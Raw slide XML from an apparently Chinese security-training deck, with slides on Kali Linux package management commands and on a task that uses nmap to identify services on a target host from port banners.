                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654675" y="890270"/>
            <a:ext cx="5828030" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Kali是基于Debian类型的Linux系统，其主要包含在线和离线两种软件包管理工具，如dpkg和apt。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dpkg(Debian Package)管理工具的软件包名是以.deb为后缀的。这种工具适用于系统不能联网的情况。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>例如，要安装tree命令的安装包，可先将tree.deb传到Linux系统中，再使用如下命令安装。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo dpkg-i tree_1.5.3-1_i386.deb	安装软件</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo dpkg-r tree		卸载软件</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用上述方法，读者可尝试练习Nessus的安装。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>APT(Advanced Packaging Tool)高级软件工具适合系统能够连接互联网的情况。安装tree命令安装包的方法如下。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo apt-get install tree		安装tree</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo apt-get remove tree		卸载tree</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo apt-get update		更新软件</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo apt-get upgrade				</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将.rpm文件转为.deb文件。.rpm为RedHat使用的软件格式，在Ubuntu下不能直接使用，因此需要转换。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sudo alien file.rpm</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1967865"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1967865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="1753235"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>本任务使用nmap工具对目标主机进行扫描，获取目标主机端口的banner信息，并通过banner信息获得包括软件开发商、软件名称、服务类型、版本号等信息。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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8" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4225290" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4225290" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3559810" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap获取主机主机端口Banner信息</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
